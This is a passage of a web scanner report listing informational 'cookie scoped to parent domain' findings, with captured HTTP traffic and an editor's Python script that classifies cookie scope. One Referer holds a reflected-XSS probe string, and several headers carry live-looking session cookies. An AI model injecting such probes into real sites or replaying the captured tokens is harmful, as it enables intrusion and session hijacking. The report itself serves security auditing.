Set-Cookie: v1st=585D1ECA0A35F6F3; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com
Date: Tue, 06 Sep 2011 11:59:35 GMT
Connection: close

//Version: JT02
//V1 of Instrumentation Toolkit Addition
//Staging version with staging sensors

var _JT=new Object();
_JT.protocol=location.protocol;//override "https:"
_JT.v="JT01.02";
_JT.ns
...[SNIP]...

9.18. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

9.19. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Tue, 06 Sep 2011 12:24:55 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 4621
Connection: close
Content-Type: image/png;charset=UTF-8

[binary PNG image body (Content-Length 4621), not shown]
...[SNIP]...

9.20. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=52B4547347B0428CE9D783866B22AFED; Path=/; HttpOnly
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.comcast.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Fri, 11 Mar 2011 08:18:50 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 1238
Connection: close
Content-Type: image/jpeg;charset=UTF-8

[binary JPEG (JFIF) image body (Content-Length 1238), not shown]
...[SNIP]...

9.21. http://frontier.my.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...

9.22. http://frontier.my.yahoo.com/e/js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

9.23. http://gdyn.pgatour.com/1.1/1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1315331430246 HTTP/1.1
Host: gdyn.pgatour.com
Proxy-Connection: keep-alive
Referer: http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:30 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Set-Cookie: adDEon=true; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:51:30 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.24. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-50185&member=30 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6VB-Z@twQ*TwCCvD7is8(MgCt^.O$RtMlE:ZtV:MZGqsO1q2A5/uRmd(QSn'DMBW!Tkfqr^=o6C(jUw_XyuaANf-a(SNp`lEjODQ=yVR!5SwrR.nTl'Xp6Y^Cw%8D0%!6!2Nhw=p3^_TyZV<GWi6Ga]]uLn39N-[xvKC6d*6l?-t<mjC8Pwqv!01113?+OVga; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Mon, 05-Dec-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6VB-Z@twQ*TwCCvD7is8(MgCt^.O$RtMlE:ZtV:MZGqsO1q2A5/uRmd(QSn'DMBW!Tkfqr^=o6C(jUw_XyuaANf-a(SNp`lEjODQ=yVR!5SwrR.nTl'Xp6Y^Cw%8D0%!6!2Nhw=p3^_TyZV<GWi6Ga]]uLn39N-[xvKC6d*6l?-t<mjC8Pwqv!01113?+OVga; path=/; expires=Mon, 05-Dec-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:40 GMT

GIF89a.............!.......,........@..L..;

9.25. http://id.google.com/verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=5F_Tq12iuIBVmCcJ0klLu47YIN53QGzsXYjnZNlgug=GXP1xng2Bog0jgcA; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; expires=Wed, 07-Mar-2012 11:50:24 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 06 Sep 2011 11:50:24 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
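
The entries in this section all come from the same scanner check: a Set-Cookie header whose Domain attribute names a parent of the host that issued it. The script below is an example added by the editor, not part of the XSS.Cx report or of the scanner that produced it. It parses Set-Cookie values the way a browser does for scope purposes (RFC 6265: leading dot ignored, no Domain attribute means host-only), classifies each cookie relative to its issuing host, and runs the check over Set-Cookie lines copied from the comcast, yahoo and google responses above. The scope labels ("host-only", "host-exact", "parent-scoped", "rejected") and the function names are the editor's own; the public-suffix handling is deliberately simplified, as noted in the code.

```python
"""Classify Set-Cookie Domain scope the way the 'cookie scoped to parent domain'
check does, and run it over Set-Cookie lines copied from responses in this report.

Example code added by the editor; it is not part of the XSS.Cx report or of the
scanner that produced it. Scope labels and function names are the editor's own.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None   # None means no Domain attribute: a host-only cookie
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value: name=value; attr; attr=val ..."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")   # split on the first '=' only; values may contain '='
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            # RFC 6265: a leading dot is ignored and matching is case-insensitive
            cookie.domain = val.lstrip(".").lower()
        elif key == "path":
            cookie.path = val or "/"
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
        # Expires, Max-Age, Version and unknown attributes do not affect scope
    return cookie


def scope(cookie: Cookie, issuing_host: str) -> str:
    """How widely the browser will send this cookie, relative to the host that set it."""
    host = issuing_host.lower()
    if cookie.domain is None:
        return "host-only"          # sent to exactly issuing_host, never to its subdomains
    # Simplification: browsers reject Domain values on the Public Suffix List
    # (e.g. Domain=com); "no dot in the domain" is the cheap approximation used here.
    if "." not in cookie.domain:
        return "rejected"
    if cookie.domain == host:
        return "host-exact"         # Domain equal to the host: the host and its subdomains
    if host.endswith("." + cookie.domain):
        return "parent-scoped"      # every host under the parent can read or overwrite it
    return "rejected"               # Domain does not cover the issuing host: browser drops it


# Set-Cookie values copied from responses in this report, keyed by the issuing host.
SAMPLE_RESPONSES: Dict[str, List[str]] = {
    "forums.comcast.com": [
        "LiSESSIONID=52B4547347B0428CE9D783866B22AFED; Path=/; HttpOnly",
        "VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/",
    ],
    "frontier.my.yahoo.com": [
        "U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; "
        "expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com",
        "MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; "
        "expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly",
    ],
    "id.google.com": [
        "SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; "
        "expires=Wed, 07-Mar-2012 11:50:24 GMT; path=/verify; domain=.google.com; HttpOnly",
    ],
}


def audit(responses: Dict[str, List[str]]) -> List[Tuple[str, str, str, bool]]:
    """One (host, cookie name, scope, HttpOnly) row per Set-Cookie in the capture."""
    rows = []
    for host, headers in responses.items():
        for header in headers:
            cookie = parse_set_cookie(header)
            rows.append((host, cookie.name, scope(cookie, host), cookie.httponly))
    return rows


def parent_scoped(responses: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """Only what the scanner reports: cookies scoped to a parent of the issuing host."""
    return [(host, name) for host, name, sc, _ in audit(responses) if sc == "parent-scoped"]


if __name__ == "__main__":
    for host, name, sc, httponly in audit(SAMPLE_RESPONSES):
        print(f"{host:24} {name:16} {sc:14} HttpOnly={httponly}")
```

Run against the captured headers, the check separates the two comcast cookies the way a reviewer would want: LiSESSIONID is host-only and HttpOnly, so it stays on forums.comcast.com, while VISITORID is sent to every host under comcast.com. Two caveats the scanner text does not spell out: a parent-scoped cookie can be overwritten by any sibling host, not just read, so "review its function" includes checking whether the application trusts its value; and a Domain attribute equal to the issuing host (MYFMP_Sacfea3 above) is not flagged, yet still extends the cookie to that host's subdomains.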

9.26. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=161&fmt=redirect&sec=0&d4=0 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315258459362_65704651_as3105_imp|374#1315258459362_65704651_as3105_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p161r=b$u-32#A.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/
